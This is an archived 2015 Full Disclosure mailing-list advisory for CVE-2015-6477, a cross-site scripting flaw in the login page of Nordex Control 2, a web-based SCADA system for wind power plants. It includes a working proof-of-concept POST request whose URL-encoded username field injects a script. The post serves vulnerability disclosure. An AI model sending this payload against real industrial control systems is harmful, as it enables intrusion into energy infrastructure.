[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Nordex Control 2 (NC2) SCADA V16 and prior versions - XSS
From: Karn Ganeshen <karnganeshen () gmail ! com>
Date: 2015-12-24 18:05:42
Message-ID: CAB8+WF1i0s_q3Y3ho8CXJ0=YDQMx+0wE6Fo8A4K2cqqSD7U+iQ () mail ! gmail ! com
[Download RAW message or body]
*Nordex NC2 XSS Vulnerability*
*AFFECTED PRODUCTS*
Nordex Control 2 (NC2) SCADA V16 and prior versions.
Nordex is a company based in Germany that maintains offices in countries
around the world.
The affected product, Nordex Control 2, is a web-based SCADA system for
wind power plants. According to Nordex, NC2 is deployed across the Energy
sector. Nordex estimates that this product is used primarily in the United
States, Europe, and China.
*CVE-ID*
CVE-2015-6477
*Reference*
https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01
*Vulnerable parameter*
username
*PoC*
POST /login HTTP/1.1
connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en
--
Best Regards,
Karn Ganeshen
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic